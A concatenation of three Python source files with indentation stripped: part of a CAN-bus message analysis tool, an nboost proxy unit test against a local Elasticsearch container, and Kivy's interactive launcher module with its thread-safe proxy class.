out.append("Total Messages: %d (repeat: %d / similar: %d)" % (msg_count, data_repeat, data_similar))
return "\n".join(out)
def printCanSessionsIso(self, arbid_list=None, advfilters=[]):
'''
Split CAN messages into Arbitration ID's and prints entire
sessions for each CAN id.
Defaults to printing by least number of messages, including all IDs
Or... provide your own list of ArbIDs in whatever order you like
'''
if arbid_list == None:
arbids = self.getArbitrationIdsIso()
else:
arbids = [arbdata for arbdata in self.getArbitrationIdsIso() if arbdata[1] in arbid_list]
for datalen,arbid,msgs in arbids:
print self.reprCanMsgsIso(arbids=[arbid], advfilters=advfilters)
raw_input("\nPress Enter to review the next Session...")
print
def printBookmarksIso(self):
'''
Print out the list of current Bookmarks and where they sit
'''
print(self.reprBookmarksIso())
def printAsciiStringsIso(self, minbytes=4, strict=True):
'''
Search through messages looking for ASCII strings
'''
for idx, ts, arbid, msg in self.genCanMsgsIso():
if hasAscii(msg, minbytes=minbytes, strict=strict):
print reprCanMsgIso(idx, ts, arbid, msg, repr(msg))
def reprBookmarksIso(self):
'''
get a string representation of the bookmarks
'''
out = []
for bid in range(len(self.bookmarks_iso)):
out.append(self.reprBookmarkIso(bid))
return '\n'.join(out)
def reprBookmarkIso(self, bid):
'''
get a string representation of one bookmark
'''
msgidx = self.bookmarks_iso[bid]
info = self.bookmark_info_iso.get(bid)
comment = info.get('comment')
if comment == None:
return "bkmkidx: %d\tmsgidx: %d\tbkmk: %s" % (bid, msgidx, info.get('name'))
def restoreSession(self, me, force=False):
'''
Load a previous analysis session from a python dictionary object
see: saveSession()
'''
if isinstance(self._io, serial.Serial) and force==False:
print("Refusing to reload a session while active session! use 'force=True' option")
return
self._messages = me.get('messages')
self.bookmarks = me.get('bookmarks')
self.bookmark_info = me.get('bookmark_info')
self.comments = me.get('comments')
self.bookmarks_iso = me.get('bookmarks_iso')
self.bookmark_info_iso = me.get('bookmark_info_iso')
def saveSession(self):
'''
Save the current analysis session to a python dictionary object
What you do with it form there is your own business.
This function is called by saveSessionToFile() to get the data
to save to the file.
'''
savegame = { 'messages' : self._messages,
'bookmarks' : self.bookmarks,
'bookmark_info' : self.bookmark_info,
'bookmarks_iso' : self.bookmarks_iso,
'bookmark_info_iso' : self.bookmark_info_iso,
'comments' : self.comments,
}
return savegame
######### administrative, supporting code ##########
cs = []
def cleanupInteractiveAtExit():
global cs
for c in cs:
try:
c.__del__()
except:
pass
devlocs = [
'/dev/ttyACM0',
'/dev/ttyACM1',
'/dev/ttyACM2',
'/dev/tty.usbmodem1411',
'/dev/tty.usbmodem1421',
'/dev/tty.usbmodem1431',
'/dev/ttyACM0',
]
def getDeviceFile():
for devloc in devlocs:
if os.path.exists(devloc):
return devloc
def interactive(port=None, InterfaceClass=CanInterface, intro='', load_filename=None, can_baud=None):
global c
import atexit
c = InterfaceClass(port=port, load_filename=load_filename)
atexit.register(cleanupInteractiveAtExit)
if load_filename is None:
if can_baud != None:
c.setCanBaud(can_baud)
else:
c.setCanBaud(CAN_500KBPS)
gbls = globals()
lcls = locals()
try:
import IPython.Shell
ipsh = IPython.Shell.IPShell(argv=[''], user_ns=lcls, user_global_ns=gbls)
print intro
ipsh.mainloop(intro)
except ImportError, e:
try:
from IPython.terminal.interactiveshell import TerminalInteractiveShell
ipsh = TerminalInteractiveShell()
ipsh.user_global_ns.update(gbls)
ipsh.user_global_ns.update(lcls)
ipsh.autocall = 2 # don't require parenthesis around *everything*. be smart!
ipsh.mainloop(intro)
except ImportError, e:
try:
from IPython.frontend.terminal.interactiveshell import TerminalInteractiveShell
ipsh = TerminalInteractiveShell()
ipsh.user_global_ns.update(gbls)
ipsh.user_global_ns.update(lcls)
ipsh.autocall = 2 # don't require parenthesis around *everything*. be smart!
ipsh.mainloop(intro)
except ImportError, e:
print e
shell = code.InteractiveConsole(gbls)
shell.interact(intro)
|
test_proxy.py
|
from nboost.proxy import Proxy
import subprocess
import unittest
import requests
from threading import Thread
from elasticsearch import Elasticsearch
import time
from pprint import pprint
class TestProxy(unittest.TestCase):
def test_travel_tutorial(self):
subprocess.call('docker pull elasticsearch:7.4.2', shell=True)
subprocess.call('docker run -d -p 9200:9200 -p 9300:9300 '
'-e "discovery.type=single-node" elasticsearch:7.4.2',
shell=True)
for _ in range(5):
Elasticsearch().index(index='example', body={'field': 'value'})
proxy = Proxy(
model_dir='shuffle-model',
model='ShuffleModelPlugin',
uport=9200,
debug=True,
verbose=True, query_prep='lambda query: query.split(":")[-1]'
)
t = Thread(target=proxy.run)
t.start()
time.sleep(2)
# search
proxy_res = requests.get(
'http://localhost:8000/example/_search',
params={
'q': 'field:value',
'size': 3,
'topn': 20
}
)
self.assertTrue(proxy_res.ok)
pprint(proxy_res.json())
response = proxy_res.json()['nboost']
self.assertEqual('value', response['query'])
self.assertEqual(3, response['topk'])
self.assertEqual(20, response['topn'])
self.assertEqual(3, len(response['cvalues']))
# fallback
fallback_res = requests.get('http://localhost:8000/')
self.assertTrue(fallback_res.ok)
print(fallback_res.content.decode())
# status
status_res = requests.get('http://localhost:8000/nboost/status')
self.assertTrue(status_res.ok)
print(status_res.content.decode())
# invalid host
invalid_res = requests.get('http://localhost:8000/example/_search', params={'uport': 2000})
print(invalid_res.content)
self.assertFalse(invalid_res.ok)
|
interactive.py
|
'''
Interactive launcher
====================
.. versionadded:: 1.3.0
The :class:`InteractiveLauncher` provides a user-friendly python shell
interface to an :class:`App` so that it can be prototyped and debugged
interactively.
.. note::
The Kivy API intends for some functions to only be run once or before the
main EventLoop has started. Methods that can normally be called during the
course of an application will work as intended, but specifically overriding
methods such as :meth:`on_touch` dynamically leads to trouble.
Creating an InteractiveLauncher
-------------------------------
Take your existing subclass of :class:`App` (this can be production code) and
pass an instance to the :class:`InteractiveLauncher` constructor.::
from kivy.interactive import InteractiveLauncher
from kivy.app import App
from kivy.uix.button import Button
class MyApp(App):
def build(self):
return Button(test='Hello Shell')
launcher = InteractiveLauncher(MyApp())
launcher.run()
After pressing *enter*, the script will return. This allows the interpreter to
continue running. Inspection or modification of the :class:`App` can be done
safely through the InteractiveLauncher instance or the provided
:class:`SafeMembrane` class instances.
.. note::
If you want to test this example, start Python without any file to have
already an interpreter, and copy/paste all the lines. You'll still have the
interpreter at the end + the kivy application running.
Interactive Development
-----------------------
IPython provides a fast way to learn the Kivy API. The :class:`App` instance
and all of it's attributes, including methods and the entire widget tree,
can be quickly listed by using the '.' operator and pressing 'tab'. Try this
code in an Ipython shell.::
from kivy.interactive import InteractiveLauncher
from kivy.app import App
from kivy.uix.widget import Widget
from kivy.graphics import Color, Ellipse
class MyPaintWidget(Widget):
def on_touch_down(self, touch):
with self.canvas:
Color(1, 1, 0)
d = 30.
Ellipse(pos=(touch.x - d/2, touch.y - d/2), size=(d, d))
class TestApp(App):
def build(self):
return Widget()
i = InteractiveLauncher(TestApp())
i.run()
i. # press 'tab' to list attributes of the app
i.root. # press 'tab' to list attributes of the root widget
# App is boring. Attach a new widget!
i.root.add_widget(MyPaintWidget())
i.safeIn()
# The application is now blocked.
# Click on the screen several times.
i.safeOut()
# The clicks will show up now
# Erase artwork and start over
i.root.canvas.clear()
.. note::
All of the proxies used in the module store their referent in the
:attr:`_ref` attribute, which can be accessed directly if needed, such as
for getting doc strings. :func:`help` and :func:`type` will access the
proxy, not its referent.
Directly Pausing the Application
--------------------------------
Both the :class:`InteractiveLauncher` and :class:`SafeMembrane` hold internal
references to the :class:`EventLoop`'s 'safe' and 'confirmed'
:class:`threading.Event` objects. You can use their safing methods to control
the application manually.
:meth:`SafeMembrane.safeIn` will cause the application to pause and
:meth:`SafeMembrane.safeOut` will allow a paused application
to continue running. This is potentially useful for scripting actions into
functions that need the screen to update etc.
.. note::
The pausing is implemented via the
:class:`Clocks' <kivy.clock.Clock>`
:meth:`~kivy.clock.ClockBase.schedule_once` method
and occurs before the start of each frame.
Adding Attributes Dynamically
-----------------------------
.. note::
This module uses threading and object proxies to encapsulate the running
:class:`App`. Deadlocks and memory corruption can occur if making direct
references inside the thread without going through the provided proxy(s).
The :class:`InteractiveLauncher` can have attributes added to it exactly like a
normal object and if these were created from outside the membrane, they will
not be threadsafe because the external references to them in the python
interpreter do not go through InteractiveLauncher's membrane behavior,
inherited from :class:`SafeMembrane`.
To threadsafe these external references, simply assign them to
:class:`SafeMembrane` instances of themselves like so::
from kivy.interactive import SafeMembrane
interactiveLauncher.attribute = myNewObject
# myNewObject is unsafe
myNewObject = SafeMembrane(myNewObject)
# myNewObject is now safe. Call at will.
myNewObject.method()
TODO
====
Unit tests, examples, and a better explanation of which methods are safe in a
running application would be nice. All three would be excellent.
Could be re-written with a context-manager style i.e.::
with safe:
foo()
Any use cases besides compacting code?
'''
__all__ = ('SafeMembrane', 'InteractiveLauncher')
from kivy.app import App
from kivy.base import EventLoop
from kivy.clock import Clock
from threading import Thread, Event
def safeWait(dt):
EventLoop.confirmed.set()
EventLoop.safe.wait()
EventLoop.confirmed.clear()
def unwrap(ob):
while type(ob) == SafeMembrane:
ob = ob._ref
return ob
class SafeMembrane(object):
'''
This help is for a proxy object. Did you want help on the proxy's referent
instead? Try using help(<instance>._ref)
The SafeMembrane is a threadsafe proxy that also returns attributes as new
thread-safe objects
and makes thread-safe method calls, preventing thread-unsafe objects
from leaking into the user's environment.
'''
__slots__ = ('_ref', 'safe', 'confirmed')
def __init__(self, ob, *args, **kwargs):
self.confirmed = EventLoop.confirmed
self.safe = EventLoop.safe
self._ref = ob
def safeIn(self):
"""Provides a thread-safe entry point for interactive launching."""
self.safe.clear()
Clock.schedule_once(safeWait, -1)
self.confirmed.wait()
def safeOut(self):
"""Provides a thread-safe exit point for interactive launching."""
self.safe.set()
def isMethod(self, fn):
return type(fn) is type(self.isMethod)
# Everything from this point on is just a series of thread-safing proxy
# methods that make calls against _ref and threadsafe whenever data will be
# written to or if a method will be called. SafeMembrane instances should
# be unwrapped whenever passing them into the thread
#use type() to determine if an object is a SafeMembrane while debugging
def __repr__(self):
return self._ref.__repr__()
def __call__(self, *args, **kw):
self.safeIn()
args = list(map(unwrap, args))
for k in list(kw.keys()):
kw[k] = unwrap(kw[k])
r = self._ref(*args, **kw)
self.safeOut()
if r is not None:
return SafeMembrane(r)
def __getattribute__(self, attr, oga=object.__getattribute__):
if attr.startswith('__') or attr == '_ref':
subject = oga(self, '_ref')
if attr == '_ref':
return subject
return getattr(subject, attr)
return oga(self, attr)
def __getattr__(self, attr, oga=object.__getattribute__):
r = getattr(oga(self, '_ref'), attr)
return SafeMembrane(r)
def __setattr__(self, attr, val, osa=object.__setattr__):
if (attr == '_ref'
or hasattr(type(self), attr) and not attr.startswith('__')):
osa(self, attr, val)
else:
self.safeIn()
val = unwrap(val)
setattr(self._ref, attr, val)
self.safeOut()
def __delattr__(self, attr, oda=object.__delattr__):
self.safeIn()
delattr(self._ref, attr)
self.safeOut()
def __bool__(self):
return bool(self._ref)
def __getitem__(self, arg):
return SafeMembrane(self._ref[arg])
def __setitem__(self, arg, val):
self.safeIn()
val = unwrap(val)
self._ref[arg] = val
self.safeOut()
def __delitem__(self, arg):
self.safeIn()
del self._ref[arg]
self.safeOut()
def __getslice__(self, i, j):
return SafeMembrane(self._ref[i:j])
def __setslice__(self, i, j, val):
self.safeIn()
val = unwrap(val)
self._ref[i:j] = val
self.safeOut()
def __delslice__(self, i, j):
self.safeIn()
del self._ref[i:j]
self.safeOut()
def __enter__(self, *args, **kwargs):
self.safeIn()
self._ref.__enter__(*args, **kwargs)
def __exit__(self, *args, **kwargs):
self._ref.__exit__(*args, **kwargs)
self.safeOut()
class InteractiveLauncher(SafeMembrane):
'''
Proxy to an application instance that launches it in a thread and
then returns and acts as a proxy to the application in the thread.
'''
__slots__ = ('_ref', 'safe', 'confirmed', 'thread', 'app')
def __init__(self, app=None, *args, **kwargs):
if app is None:
app = App()
EventLoop.safe = Event()
self.safe = EventLoop.safe
self.safe.set()
EventLoop.confirmed = Event()
self.confirmed = EventLoop.confirmed
self.app = app
def startApp(app=app, *args, **kwargs):
app.run(*args, **kwargs)
self.thread = Thread(target=startApp, *args, **kwargs)
def run(self):
self.thread.start()
#Proxy behavior starts after this is set. Before this point, attaching
#widgets etc can only be done through the Launcher's app attribute
self._ref = self.app
def stop(self):
EventLoop.quit = True
self.thread.join()
#Act like the app instance even before _ref is set
def __repr__(self):
return self.app.__repr__()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.